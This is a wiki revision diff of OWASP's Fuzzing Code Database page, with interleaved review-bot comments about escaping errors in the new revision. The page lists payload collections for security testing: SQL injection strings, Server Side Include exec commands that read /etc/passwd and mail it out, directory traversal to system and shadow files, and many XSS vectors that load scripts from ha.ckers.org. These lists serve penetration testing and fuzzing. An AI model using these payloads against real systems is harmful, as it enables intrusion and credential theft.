Difference between revisions of "Category:OWASP Fuzzing Code Database"

From OWASP
Line 1: Line 1:
This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.
+
This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.  
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.
+
Please add your own statements and check out the statements already added.  
+
  
==== News ====
+
==== News ====
  
'''02 February 2010''''
+
'''02 February 2010''''  
  
* Created new Category Lotus/Notes Files
+
*Created new Category Lotus/Notes Files
  
'''11 August 2009'''
+
'''11 August 2009'''  
+
* Created new Category: XML Attacks
+
  
''Update Statements''
+
*Created new Category: XML Attacks
  
* 15 new XML Statements
+
''Update Statements''
* 93 new SQL Injections Statements
+
* 67 new Traversal Directory Statements
+
* Delete 33 XSS Statement Duplicate
+
* 30 New XSS Statements
+
  
'''7 August 2009'''
+
*15 new XML Statements
+
*93 new SQL Injections Statements
* Updated the objectives of the project.
+
*67 new Traversal Directory Statements
 +
*Delete 33 XSS Statement Duplicate
 +
*30 New XSS Statements
  
'''21 July 2009'''
+
'''7 August 2009'''  
  
* Set the team responsible for the project.
+
*Updated the objectives of the project.
  
==== Goals ====
+
'''21 July 2009'''
  
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.
+
*Set the team responsible for the project.
  
In addition, the following functionalities will be included on this project:
+
==== Goals  ====
  
1 - The statements of ASDR Project
+
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.
2 - Browser
+
3 - Operational System
+
4 - Databases
+
  
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:
+
In addition, the following functionalities will be included on this project:  
  
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.
+
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases
  
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.
+
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:
  
3 - Possibility to support users on the report of their own experiences with the statements.
+
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.  
  
==== Statements ====
+
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.
  
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===
+
3 - Possibility to support users on the report of their own experiences with the statements.
  
<pre>
+
==== Statements  ====
/852566C90012664F
+
 
 +
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===
 +
<pre>/852566C90012664F
 
/admin4.nsf
 
/admin4.nsf
 
/admin5.nsf
 
/admin5.nsf
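Review bot: The rewritten intro paragraph misspells "approach" as "aproach", and in the Goals section the four functionalities are collapsed onto a single line ("1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases"), which loses the one-item-per-line list the previous revision had. Restore one item per line, and while the News block is being touched, drop the stray fourth apostrophe in '''02 February 2010'''' so the bold markup closes cleanly.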
Line 164: Line 157:
 
/.nsf/../winnt/win.ini
 
/.nsf/../winnt/win.ini
 
/?Open  
 
/?Open  
</pre>
+
</pre>  
 
+
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===
+
<pre>Statement
 
+
<pre>
+
Statement
+
 
'sqlvuln
 
'sqlvuln
 
'+sqlvuln
 
'+sqlvuln
Line 276: Line 266:
 
to_timestamp_tz
 
to_timestamp_tz
 
tz_offset
 
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
+
&lt;&gt;"'%;)(&amp;+
 
'%20or%201=1
 
'%20or%201=1
 
%27%20or%201=1
 
%27%20or%201=1
Line 282: Line 272:
 
%20'sleep%2050'
 
%20'sleep%2050'
 
char%4039%41%2b%40SELECT
 
char%4039%41%2b%40SELECT
&apos;%20OR
+
&amp;apos;%20OR
 
'sqlattempt1
 
'sqlattempt1
 
(sqlattempt2)
 
(sqlattempt2)
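Review bot: The entry that was &apos;%20OR is now written as &amp;apos;%20OR, which is escaped twice, so it will display as the literal text &apos;%20OR and not as a quote character followed by %20OR. Check the preview against the previous revision and escape only once, so that a tool importing this list gets the same statement as before.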
Line 297: Line 287:
 
)
 
)
 
%29
 
%29
&
+
&amp;
 
%26
 
%26
 
!
 
!
Line 312: Line 302:
 
' or 3=3
 
' or 3=3
 
‘ or 3=3 --
 
‘ or 3=3 --
</pre>
+
</pre>  
 
+
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===
+
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;
 
+
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;
<pre>
+
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;
<!--#exec cmd="/bin/ls /" --><br/>
+
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;
<!--#exec cmd="cat /etc/passwd" --><br/>
+
</pre>  
<!--#exec cmd="find / -name *.* -print" --><br/>
+
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
+
<pre>Statement
</pre>
+
 
+
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===
+
 
+
<pre>
+
Statement
+
 
\..\WINDOWS\win.ini
 
\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
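Review bot: In the SSI section every statement now ends in an escaped &lt;br/&gt;, so the line-break markup becomes part of the displayed statement. Inside a pre block the break is not needed, so remove it instead of escaping it. The fourth statement also still carries "&lt;mailto:Foobar@email.de&gt;", which looks like an auto-linking artifact and not part of the command, and the section heading keeps the placeholder date "xx/xx/xx".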
Line 434: Line 418:
 
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
 
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
 
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
 
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
+
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
+
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;
 
../../../../../../../../conf/server.xml
 
../../../../../../../../conf/server.xml
 
/../../../../../../../../bin/id|
 
/../../../../../../../../bin/id|
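Review bot: Both /bin/cat entries now wrap the path in \\&amp;apos; where the previous revision had \\&apos;, so the rendered statements gain a literal "&apos;" on each side. If the quote character was intended, write it directly inside the pre block or escape it a single time.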
Line 459: Line 443:
 
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
</pre>
+
</pre>  
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''
+
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''  
  
=== XSS Statements - Most effective/most common statements ===
+
=== XSS Statements - Most effective/most common statements ===
  
Testing Statements
+
Testing Statements  
<pre>
+
<pre>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
'';!--"&lt;XSS&gt;=&amp;{()}
'';!--"<XSS>=&{()}
+
</pre>  
</pre>
+
Common exploit code (covers a lot of XSS vulnerabilities)  
 
+
<pre>'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='
Common exploit code (covers a lot of XSS vulnerabilities)
+
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="
<pre>
+
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
+
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
+
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
+
 
'); alert('xss'); var x='
 
'); alert('xss'); var x='
 
\\'); alert(\'xss\');var x=\'
 
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
+
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));
</pre>
+
</pre>  
 
+
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)  
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)
+
<pre>Statements
 
+
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
<pre>
+
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"
Statements
+
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"
"<IMG SRC=""javascript:alert('XSS');"">"
+
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"
<IMG SRC=JaVaScRiPt:alert('XSS')>
+
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"
"<IMG SRC=javascript:alert(""XSS"")>"
+
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
+
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
+
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
"&lt;IMG SRC=""jav"
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
"ascript:alert('XSS');""&gt;"
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"
"<IMG SRC=""jav"
+
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"
"ascript:alert('XSS');"">"
+
"&lt;IMG SRC="" &amp;#14;  javascript:alert('XSS');""&gt;"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
+
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
+
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
+
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
+
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
+
"&lt;IMG SRC=""javascript:alert('XSS')"""
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
<SCRIPT SRC=//ha.ckers.org/.j>
+
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;
"<IMG SRC=""javascript:alert('XSS')"""
+
<iframe src=http://ha.ckers.org/scriptlet.html <
+
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
+
 
"\"";alert('XSS');//"
 
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
+
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
+
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"
<BODY ONLOAD=alert('XSS')>
+
&lt;BODY ONLOAD=alert('XSS')&gt;
"<IMG DYNSRC=""javascript:alert('XSS')"">"
+
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
+
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
+
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"
"<BR SIZE=""&{alert('XSS')}"">"
+
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
+
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
+
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
+
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
+
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
+
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"
"<XSS STYLE=""behavior: url(xss.htc);"">"
+
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
+
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
+
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"
 
¼script¾alert(¢XSS¢)¼/script¾
 
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
+
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
+
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
+
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
+
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
+
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
+
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
+
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
+
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
+
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
+
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
+
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
+
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
+
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
+
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
+
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
+
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;
"<BASE HREF=""javascript:alert('XSS');//"">"
+
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
+
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
+
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
+
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
+
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
+
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
+
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
+
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
+
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
+
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
+
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
